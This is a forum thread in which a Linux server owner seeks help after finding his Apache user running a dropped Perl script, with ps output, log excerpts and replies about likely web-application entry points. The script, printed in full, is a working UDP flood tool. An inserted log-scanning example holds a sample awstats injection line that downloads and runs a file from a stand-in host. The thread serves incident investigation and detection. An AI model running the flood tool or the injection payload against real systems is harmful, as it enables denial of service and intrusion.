# Exploit in apache (getting hacked)  Help me figure out how??

## Sunthief

Hey all, I found my Sun acting pretty weird the other day and checked out what it was doing. Here are the results:

```
$ ps -aux

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND

root         1  0.0  0.0   1568   688 ?        S    Feb12   0:20 init [3]  

root         2  0.0  0.0      0     0 ?        S    Feb12   0:00 [keventd]

root         3  0.0  0.0      0     0 ?        SN   Feb12   0:01 [ksoftirqd_CPU0]

root         4  0.0  0.0      0     0 ?        SN   Feb12   0:00 [ksoftirqd_CPU1]

root         5  0.0  0.0      0     0 ?        S    Feb12   0:00 [kswapd]

root         6  0.0  0.0      0     0 ?        S    Feb12   0:00 [bdflush]

root         7  0.0  0.0      0     0 ?        S    Feb12   0:05 [kupdated]

root         9  0.0  0.0      0     0 ?        S    Feb12   0:00 [scsi_eh_0]

root        10  0.0  0.0      0     0 ?        S    Feb12   0:00 [scsi_eh_1]

root        11  0.0  0.0      0     0 ?        S<   Feb12   0:00 [mdrecoveryd]

root        12  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        13  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        14  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        15  0.0  0.0      0     0 ?        S<   Feb12   0:00 [raid1d]

root        16  0.0  0.0      0     0 ?        S    Feb12   0:00 [kjournald]

root        43  0.0  0.0   2432  1336 ?        Ss   Feb12   0:00 /sbin/devfsd /dev

root       136  0.0  0.0      0     0 ?        S<   Feb12   0:08 [raid5d]

root       147  0.0  0.0      0     0 ?        S    Feb12   0:00 [kjournald]

root       148  0.0  0.0      0     0 ?        S    Feb12   0:04 [kjournald]

root       149  0.0  0.0      0     0 ?        S    Feb12   0:04 [kjournald]

root       635  0.0  0.0   1848   824 ?        Ss   Feb12   0:06 metalog [MASTER]                                     

root       636  0.0  0.0   1800   712 ?        S    Feb12   0:00 metalog [KERNEL]                                     

root      1450  0.0  0.0   2840  1568 ?        Ss   Feb12   0:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/mysql/my.cnf

mysql     1488  0.0  1.3  78752 27016 ?        S    Feb12   0:01 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1502  0.0  1.3  78752 27016 ?        S    Feb12   0:01 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1503  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1504  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1505  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1506  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1556  0.0  1.3  78752 27016 ?        S    Feb12   0:02 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1557  0.0  1.3  78752 27016 ?        S    Feb12   0:01 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1558  0.0  1.3  78752 27016 ?        S    Feb12   0:00 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

mysql     1567  0.0  1.3  78752 27016 ?        S    Feb12   0:02 /usr/sbin/mysqld --defaults-file=/etc/mysql/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file

root      1579  0.0  0.0   4440  2016 ?        Ss   Feb12   0:12 /usr/sbin/sshd -o PidFile=/var/run/sshd.pid

clamav    1641  0.0  0.4  12224 10264 ?        Ss   Feb12   0:00 /usr/sbin/clamd

clamav    1643  0.0  0.0   3632  1480 ?        Ss   Feb12   0:00 /usr/bin/freshclam -d

root      1684  0.0  0.0   1552   616 ?        S    Feb12   0:00 /usr/sbin/courierlogger -pid=/var/run/authdaemon.pid -start /usr/lib/courier/courier-authlib/authdaemond

root      1685  0.0  0.0   2272   840 ?        S    Feb12   0:00 /usr/lib/courier/courier-authlib/authdaemond

root      1694  0.0  0.0   2752  1088 ?        S    Feb12   0:03 /usr/lib/courier/courier-authlib/authdaemond

root      1695  0.0  0.0   2752  1088 ?        S    Feb12   0:03 /usr/lib/courier/courier-authlib/authdaemond

root      1696  0.0  0.0   2752  1088 ?        S    Feb12   0:04 /usr/lib/courier/courier-authlib/authdaemond

root      1697  0.0  0.0   2752  1088 ?        S    Feb12   0:04 /usr/lib/courier/courier-authlib/authdaemond

root      1698  0.0  0.0   2752  1088 ?        S    Feb12   0:03 /usr/lib/courier/courier-authlib/authdaemond

root      1738  0.0  0.0   1776   728 ?        S    Feb12   0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=i

root      1740  0.0  0.0   1560   608 ?        S    Feb12   0:01 /usr/lib/courier-imap/courierlogger imapd

root      1788  0.0  0.0   1776   728 ?        S    Feb12   0:01 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/lib/courier-imap/courierlogger -stderrloggername=p

root      1790  0.0  0.0   1560   608 ?        S    Feb12   0:00 /usr/lib/courier-imap/courierlogger pop3d

root      1899  0.0  0.0   1616   720 ?        S    Feb12   0:21 /sbin/mdadm --monitor --scan

root      1994  0.0  1.0  25648 22224 ?        Ss   Feb12   0:04 /usr/sbin/spamd -d -r /var/run/spamd.pid -m 5 -c -H

root      2048  0.0  0.1   7744  2184 ?        Ss   Feb12   0:03 /usr/lib/postfix/master

postfix   2056  0.0  0.1   7824  2240 ?        S    Feb12   0:00 qmgr -l -t fifo -u

root      2088  0.0  0.0   2256  1040 ?        Ss   Feb12   0:00 /usr/sbin/cron

root      2137  0.0  0.0   3768  1608 ?        Ss   Feb12   0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf

root      2162  0.0  0.0   1920   952 tts/0    Ss+  Feb12   0:00 /sbin/agetty 9600 ttyS0 vt100

root      2163  0.0  1.0  25648 22224 ?        S    Feb12   0:00 spamd child

root      2164  0.0  1.0  25648 22224 ?        S    Feb12   0:00 spamd child

apache   24102 99.9  0.1   6144  3832 ?        R    Feb21 1132:55 /usr/sbin/httpd        

apache   26012  0.0  0.1   6144  3840 ?        S    01:20   0:00 /usr/sbin/httpd        

apache   26013  0.0  0.0   2832  1464 ?        S    01:20   0:00 sh -c perl /tmp/mata.txt 217.146.91.1 50000 2>&1 3>&1

apache   26014 99.9  0.1   4768  2440 ?        R    01:20 368:13 perl /tmp/mata.txt 217.146.91.1 50000

postfix  26428  0.0  0.1   7776  2144 ?        S    06:53   0:00 pickup -l -t fifo -u

root     26467  0.0  0.1   7840  2520 ?        Ss   07:23   0:00 sshd: nicholai [priv]                         

nicholai 26471  0.0  0.1   7840  2608 ?        S    07:24   0:00 sshd: nicholai@pts/0                          

nicholai 26472  0.0  0.0   2848  1800 pts/0    Ss   07:24   0:00 -bash

root     26499  0.0  0.0   3432  1432 pts/0    S    07:25   0:00 su

root     26500  0.0  0.0   2848  1784 pts/0    S+   07:25   0:00 bash

root     26580  0.0  0.1   7840  2520 ?        Ss   07:27   0:00 sshd: nicholai [priv]                         

nicholai 26584  0.7  0.1   7840  2600 ?        S    07:28   0:00 sshd: nicholai@pts/1                          

nicholai 26585  0.3  0.0   2848  1768 pts/1    Ss   07:28   0:00 -bash

root     26589  0.4  0.0   3432  1432 pts/1    S    07:28   0:00 su

root     26590  0.3  0.0   2848  1744 pts/1    S    07:28   0:00 bash

root     26593  0.0  0.0   2920  1160 pts/1    R+   07:28   0:00 ps -aux
```

As you can see, someone got the apache user to run a Perl script. Here are the contents of the script:

```
nano /tmp/mata.txt 

  GNU nano 1.3.7                                             File: /tmp/mata.txt                                                                                                   

#!/usr/bin/perl

# COE ! LABSEC IRADO

# MATA-MATA-FDC ! MATA TUDO

use Socket;

if (@ARGV < 2) {

    die "[+] labsec udp\n" .

        "[+] perl leet.pl <victim[:victim2:...:victimN]> <tempo> [porta]\n";

}

@sin = map { inet_aton $_ } split /:/, $ARGV[0];

$t   = time +$ARGV[1];

# nazis are comming!!

socket SS, PF_INET, SOCK_DGRAM, 17;

while (1) {

    send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);

    exit if time >= $t;

}

# ESSA PORRA FOI RIPPADA !

# ORIGINAL BY LIVE

```

I'm not sure how they did it???  I have been using good passwords and have my firewall set up well, checked over my logs and there was no break-in through ssh, so the exploit must have been solely through apache.....  Any ideas how they managed to upload a file to /tmp and how they could have run it using the apache user???  Plus I can't seem to kill those processes. I just have her unplugged for now, would rather keep it all going just to see how they did it so I can prevent it in the future.

----------

## msalerno

Who is the owner of the file and what's the timestamp?

Have you been through your apache logs with the above information to confirm that it is apache?

----------

## Sunthief

Here is the owner & permissions on the file:

```
-rw-r--r--   1 apache apache   517 Feb  9  2005
```

Here are some interesting Apache error logs:

```
at /var/log/apache2/error_log

[Mon Dec 26 21:02:16 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Mon Dec 26 21:02:16 2005] [notice] Digest: generating secret for digest authentication ...

[Mon Dec 26 21:02:16 2005] [notice] Digest: done

[Mon Dec 26 21:02:16 2005] [notice] Apache configured -- resuming normal operations

[Mon Dec 26 22:40:05 2005] [notice] caught SIGTERM, shutting down

[Mon Dec 26 23:09:37 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Mon Dec 26 23:09:37 2005] [notice] Digest: generating secret for digest authentication ...

[Mon Dec 26 23:09:37 2005] [notice] Digest: done

[Mon Dec 26 23:09:37 2005] [notice] Apache configured -- resuming normal operations

[Mon Dec 26 23:40:18 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/awstats

[Mon Dec 26 23:40:19 2005] [error] [client 195.28.196.79] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats.pl

[Mon Dec 26 23:40:21 2005] [error] [client 195.28.196.79] script not found or unable to stat: /var/www/localhost/cgi-bin/awstats

[Mon Dec 26 23:40:23 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlrpc.php

[Mon Dec 26 23:40:24 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/blog

[Mon Dec 26 23:40:26 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/blog

[Mon Dec 26 23:40:27 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/blogs

[Mon Dec 26 23:40:28 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/drupal

[Mon Dec 26 23:40:30 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/phpgroupware

[Mon Dec 26 23:40:31 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/wordpress

[Mon Dec 26 23:40:32 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlrpc.php

[Mon Dec 26 23:40:33 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlrpc

[Mon Dec 26 23:40:35 2005] [error] [client 195.28.196.79] File does not exist: /var/www/localhost/htdocs/xmlsrv

[Tue Dec 27 00:59:28 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 01:08:17 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 01:08:17 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 01:08:54 2005] [notice] Digest: done

[Tue Dec 27 01:08:54 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 09:49:20 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:37:10 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:37:10 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:37:10 2005] [notice] Digest: done

[Tue Dec 27 10:37:10 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:44:51 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:44:52 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:44:52 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:44:52 2005] [notice] Digest: done

[Tue Dec 27 10:44:52 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:46:37 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:46:38 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:46:38 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:46:38 2005] [notice] Digest: done

[Tue Dec 27 10:46:38 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:47:51 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 10:47:52 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 10:47:52 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 10:47:52 2005] [notice] Digest: done

[Tue Dec 27 10:47:52 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 10:47:54 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 10:47:55 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 10:50:36 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 10:53:43 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 12:51:12 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 12:51:13 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 12:51:13 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 12:51:41 2005] [notice] Digest: done

[Tue Dec 27 12:51:41 2005] [error] [client 192.168.1.2] File does not exist: /usr/htdocs

[Tue Dec 27 12:51:41 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 12:56:20 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 12:56:21 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 12:56:21 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 12:56:56 2005] [notice] Digest: done

[Tue Dec 27 12:56:56 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 13:01:25 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 13:01:27 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 13:01:27 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 13:01:51 2005] [notice] Digest: done

[Tue Dec 27 13:01:51 2005] [notice] Apache configured -- resuming normal operations

[Tue Dec 27 13:08:07 2005] [notice] caught SIGTERM, shutting down

[Tue Dec 27 13:11:13 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Tue Dec 27 13:11:13 2005] [notice] Digest: generating secret for digest authentication ...

[Tue Dec 27 13:11:13 2005] [notice] Digest: done

[Tue Dec 27 13:11:13 2005] [notice] Apache configured -- resuming normal operations

[Wed Dec 28 01:24:06 2005] [notice] caught SIGTERM, shutting down

[Wed Dec 28 07:08:43 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Wed Dec 28 07:08:43 2005] [notice] Digest: generating secret for digest authentication ...

[Wed Dec 28 07:08:43 2005] [notice] Digest: done

[Wed Dec 28 07:08:43 2005] [notice] Apache configured -- resuming normal operations

[Wed Dec 28 07:43:17 2005] [notice] caught SIGTERM, shutting down

[Wed Dec 28 07:43:19 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Wed Dec 28 07:43:19 2005] [notice] Digest: generating secret for digest authentication ...

[Wed Dec 28 07:43:19 2005] [notice] Digest: done

[Wed Dec 28 07:43:19 2005] [notice] Apache configured -- resuming normal operations

[Wed Dec 28 07:58:00 2005] [notice] caught SIGTERM, shutting down

[Wed Dec 28 07:58:03 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Wed Dec 28 07:58:03 2005] [notice] Digest: generating secret for digest authentication ...

[Wed Dec 28 07:58:04 2005] [notice] Digest: done

[Wed Dec 28 07:58:04 2005] [notice] Apache configured -- resuming normal operations

[Thu Dec 29 13:39:39 2005] [notice] caught SIGTERM, shutting down

[Thu Dec 29 13:39:41 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)

[Thu Dec 29 13:39:42 2005] [notice] Digest: generating secret for digest authentication ...

[Thu Dec 29 13:39:42 2005] [notice] Digest: done

[Thu Dec 29 13:39:42 2005] [notice] Apache configured -- resuming normal operations
```

I don't remember turning on suEXEC, so I guess that's how they did it.

I'll keep looking in the logs for the actual attack. Is there anything that I can look for in the logs that would show an attempt to su??  The log files are huge; as you can see I have logs all the way back to Dec.

Also I do have PHP enabled.  Any ideas on why I can't kill the processes???  Right now I have the network cable unplugged so I'm willing to leave it up and running till I can stop this from happening again. I'm sure it's the suEXEC for Apache that's my security hole but I'd like to know how they exploited it exactly and confirm my suspicions.

----------

## ben-xo

You've been hacked through a web application on your server. Common attack vectors (that is, buggy programs) that are used in this way are:

* old versions of "wordpress"

* old versions of "gallery"

* old versions of "phpBB"

* formmail

* old versions of "cubecart"

* many other old versions of things...

* just about anything which was written by an amateur, if you have register_globals on in your php.ini

so... time to audit your web applications.

----------

## Sunthief

Is there any way to track down which one did it?  I'm all for updating all my web services but I really prefer to confirm which one did it so I know for sure that it is fixed.  I really hate it when I fix a problem and I'm not sure which fix did it.  I am running several phpBBs but I am decently sure they are all up to date; I will go check them out.  How does an attack happen to an older version of phpBB, are there any clues I can look for to confirm this???  Thanks for the help

----------

## BlackEdder

The /tmp file tells you that you were hacked on 9 February 2005. You can probably even find out the exact time this file was created. This gives you a pretty narrow timeframe to look for in your logs. If you can't find it in there, then it will be almost impossible to be sure what happened.

More important is probably to find out if they did any more damage. You could emerge/run chkrootkit and see if that finds something....

----------

## xces

*Sunthief wrote:*

> Is there any way to track down which one did it.

Yes, check your access_log files for suspicious requests (e.g. requests involving the strings "wget", "perl" or "curl").

Also check the installed scripts (some already mentioned by ben-xo) to see if any exploits are known for them. Bugtraq, Full-Disclosure and so on are good sources of information.
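The access_log check suggested above, as an added example that is not part of the original post: each request is percent-decoded before matching, so staging steps that show up in raw logs only as `%2ftmp` or `chmod%20%2bx` are caught too, and hits are ordered with served requests (status below 400) ahead of 404 probes. The sample log lines, addresses and indicator names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>.*)" (?P<status>\d{3}) (?P<size>\S+)\s*$'
)

# Strings named in the thread (wget, perl, curl) plus the staging steps
# visible in the posted requests (/tmp, chmod, a URL passed as a parameter).
INDICATORS = {
    "download-tool": re.compile(r"\b(?:wget|curl)\b"),
    "interpreter": re.compile(r"\bperl\b"),
    "tmp-path": re.compile(r"/tmp\b"),
    "chmod": re.compile(r"\bchmod\b"),
    "remote-url-param": re.compile(r"=\s*(?:https?|ftp)://"),
}
SHELL_META = re.compile(r"[|;`]|\$\(")

# Constructed sample (documentation address ranges), shaped like the thread's logs.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Dec/2005:23:40:19 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20%2ftmp%3bwget%20198.51.100.7%2fx%3bchmod%20%2bx%20x;echo| HTTP/1.1" 404 278
192.0.2.11 - - [27/Dec/2005:01:02:03 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20%2ftmp%3bwget%20198.51.100.7%2fx%3bchmod%20%2bx%20x;echo| HTTP/1.1" 200 512
192.0.2.12 - - [27/Dec/2005:01:05:00 -0800] "GET /phpBB2/viewtopic.php?p=1322&sid=c460d0 HTTP/1.1" 200 8042
192.0.2.13 - - [27/Dec/2005:01:06:00 -0800] "GET /images/spirit/wolf.gif HTTP/1.1" 304 -
"""


def fully_unquote(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_line(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = fully_unquote(m["request"]).lower()
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    # Shell metacharacters only count inside the query string.
    _, _, query = decoded.partition("?")
    if SHELL_META.search(query):
        hits.append("shell-metachar-in-query")
    if not hits:
        return None
    status = int(m["status"])
    return {
        "host": m["host"],
        "time": m["time"],
        "status": status,
        # A 404 means the probed script was not there; anything below 400
        # means the server actually handled the request and needs review first.
        "served": status < 400,
        "indicators": hits,
        "request": decoded,
    }


def scan_log(text):
    """Scan a whole log; served requests sort ahead of failed probes."""
    findings = [f for f in map(scan_line, text.splitlines()) if f]
    return sorted(findings, key=lambda f: not f["served"])


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "SERVED" if f["served"] else "probe "
        print(flag, f["status"], f["host"], f["time"], ",".join(f["indicators"]))
```
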

----------

## Sunthief

OK, here's some more info. Here's the exact time the file was made:

```
-rw-r--r--   1 apache apache   517 2005-02-09 02:18:38.000000000 -0800
```

And here are the access_logs close to that time:

```
58.69.13.196 - - [09/Feb/2006:01:29:47 -0800] "GET /images/spirit/wolftrack1.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:01:29:47 -0800] "GET /images/spirit/wolftrack2.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:01:29:47 -0800] "GET /images/spirit/woodpecker.gif HTTP/1.1" 304 -

64.242.88.10 - - [09/Feb/2006:01:32:14 -0800] "GET /phpBB2/search.php?search_id=unanswered&sid=c460d02353c5d3ba480e7ab11beb1$

64.114.170.242 - - [09/Feb/2006:01:48:28 -0800] "GET / HTTP/1.1" 304 -

64.242.88.10 - - [09/Feb/2006:01:49:49 -0800] "GET /phpBB2/viewtopic.php?p=1322&sid=c460d02353c5d3ba480e7ab11beb182f HTTP/1.$

64.114.170.242 - - [09/Feb/2006:01:50:01 -0800] "GET / HTTP/1.1" 304 -

65.214.44.60 - - [09/Feb/2006:01:51:30 -0800] "GET /Designed/Desktop%20Solutions%20Inc/directions.htm HTTP/1.0" 404 309

64.114.170.242 - - [09/Feb/2006:01:53:54 -0800] "GET / HTTP/1.1" 304 -

64.114.170.242 - - [09/Feb/2006:01:55:08 -0800] "GET / HTTP/1.1" 304 -

64.114.170.242 - - [09/Feb/2006:01:58:25 -0800] "GET / HTTP/1.1" 304 -

64.114.170.242 - - [09/Feb/2006:02:06:25 -0800] "GET / HTTP/1.1" 304 -

192.168.1.1 - - [09/Feb/2006:02:08:20 -0800] "GET /wpad.dat HTTP/1.1" 404 268

192.168.1.1 - - [09/Feb/2006:02:08:20 -0800] "GET /wpad.dat HTTP/1.1" 404 268

64.242.88.10 - - [09/Feb/2006:02:25:55 -0800] "GET /phpBB2/profile.php?mode=viewprofile&u=36&sid=c460d02353c5d3ba480e7ab11be$

139.18.2.216 - - [09/Feb/2006:02:30:53 -0800] "GET /robots.txt HTTP/1.1" 404 278

64.242.88.10 - - [09/Feb/2006:02:44:36 -0800] "GET /phpBB2/viewtopic.php?p=1315&sid=c460d02353c5d3ba480e7ab11beb182f HTTP/1.$

58.69.13.196 - - [09/Feb/2006:02:52:58 -0800] "GET /images/spirit/woodpecker.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:52:59 -0800] "GET /images/spirit/wolftrack2.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:00 -0800] "GET /images/spirit/wolftrack1.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:01 -0800] "GET /images/spirit/wolf.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:02 -0800] "GET /images/spirit/whaletale.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:03 -0800] "GET /images/spirit/whale.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:04 -0800] "GET /images/spirit/turtle2.gif HTTP/1.1" 304 -

58.69.13.196 - - [09/Feb/2006:02:53:05 -0800] "GET /images/spirit/turtle1.gif HTTP/1.1" 304 -

```

OK, and here are the error logs during that time:

```
[Thu Feb 09 02:08:20 2006] [error] [client 192.168.1.1] File does not exist: /var/www/sunthief/wpad.dat

[Thu Feb 09 02:08:20 2006] [error] [client 192.168.1.1] File does not exist: /var/www/sunthief/wpad.dat

[Thu Feb 09 02:30:53 2006] [error] [client 139.18.2.216] File does not exist: /var/www/girlguides/robots.txt             

[Thu Feb 09 03:24:13 2006] [error] [client 66.154.102.36] File does not exist: /var/www/boundarypaintball/robots.txt

[Thu Feb 09 03:24:43 2006] [error] [client 217.151.96.164] script '/var/www/sunthief/index2.php' not found or unable to stat 

[Thu Feb 09 03:24:44 2006] [error] [client 217.151.96.164] script '/var/www/sunthief/index.php' not found or unable to stat

[Thu Feb 09 03:24:45 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/mambo

[Thu Feb 09 03:24:46 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/cvs

[Thu Feb 09 03:24:47 2006] [error] [client 217.151.96.164] script '/var/www/sunthief/xmlrpc.php' not found or unable to stat 

[Thu Feb 09 03:24:49 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/drupal

[Thu Feb 09 03:24:51 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/phpgroupware

[Thu Feb 09 03:24:52 2006] [error] [client 217.151.96.164] File does not exist: /var/www/sunthief/wordpress

```

Looks like someone was trying to run scripts there?????

----------

## int2str

Are you running phpBB on your server?

Edit:

I see, you are. That is most likely the attack vector.

Cheers,

    Andre

----------

## rev138

What version of phpBB do you run?

----------

## Sunthief

I have several copies of phpBB on my server, I'll go through and check each one to see what version it is.  How does one exploit phpBB??  I just copied my whole www directory off of another computer and now I can't just do an emerge update, but I would like to in the future. Is there a way to set up emerge to work with previously installed versions, as well as multiple versions, so I can update whenever new versions come out??

----------

## BlackEdder

The logs you showed are from a year after the tmp file was created

----------

## Sunthief

You know, you're right, there is no way it could have been created in Feb 2005 since I haven't had the computer that long.......  Must have changed the date stamp. grrrrr.  How the hell could a security hole in phpBB allow an incorrect datestamp?????
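Added example, not part of the original posts: a file's mtime can be set by its owner, while ctime is stamped by the kernel on every inode change, so a large gap between the two marks an mtime that should not be used to choose the log window. The directory contents, the 30-day host age and the one-day skew threshold are assumptions for the demo; the backdated time is the one shown for the /tmp file above.

```python
import os
import tempfile
import time
from datetime import datetime, timezone


def _iso(ts):
    """Format an epoch timestamp as UTC ISO 8601."""
    return datetime.fromtimestamp(ts, timezone.utc).isoformat()


def audit_timestamps(directory, not_before=None, max_skew=86400):
    """Flag regular files whose mtime cannot be trusted for a timeline.

    POSIX semantics: utime()/touch can set mtime to any value, but doing so
    updates ctime to the current time, and ctime cannot be set through the API.
    - mtime-predates-ctime: the inode changed more than max_skew seconds after
      the claimed modification time (also true after chmod, chown, rename or an
      archive restore, so treat it as "verify", not as proof).
    - mtime-predates-host: mtime is earlier than a time the host is known to
      have existed (not_before, e.g. the install date; supplied by the caller).
    """
    findings = []
    for entry in os.scandir(directory):
        if not entry.is_file(follow_symlinks=False):
            continue
        st = entry.stat(follow_symlinks=False)
        reasons = []
        if st.st_ctime - st.st_mtime > max_skew:
            reasons.append("mtime-predates-ctime")
        if not_before is not None and st.st_mtime < not_before:
            reasons.append("mtime-predates-host")
        if reasons:
            findings.append({
                "name": entry.name,
                "mtime": _iso(st.st_mtime),
                # ctime is the latest the file can have arrived in this state;
                # search logs up to here instead of around the mtime.
                "ctime": _iso(st.st_ctime),
                "reasons": reasons,
            })
    return sorted(findings, key=lambda f: f["name"])


def demo():
    """Build a constructed directory with one backdated file and audit it."""
    with tempfile.TemporaryDirectory() as d:
        normal = os.path.join(d, "session_ok")      # constructed file name
        dropped = os.path.join(d, "dropped.txt")    # constructed file name
        for path in (normal, dropped):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        # 2005-02-09 02:18:38 -0800, the timestamp shown in the thread, in UTC.
        old = datetime(2005, 2, 9, 10, 18, 38, tzinfo=timezone.utc).timestamp()
        os.utime(dropped, (old, old))
        host_installed = time.time() - 30 * 86400   # assumed host age
        return audit_timestamps(d, not_before=host_installed)


if __name__ == "__main__":
    for f in demo():
        print(f["name"], "mtime", f["mtime"], "ctime", f["ctime"], f["reasons"])
```
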

----------

## Maedhros

It might not be phpBB - I know awstats had at least one pretty destructive security hole a while ago... 

Moved from Other Things Gentoo to Networking & Security.

----------

## Sunthief

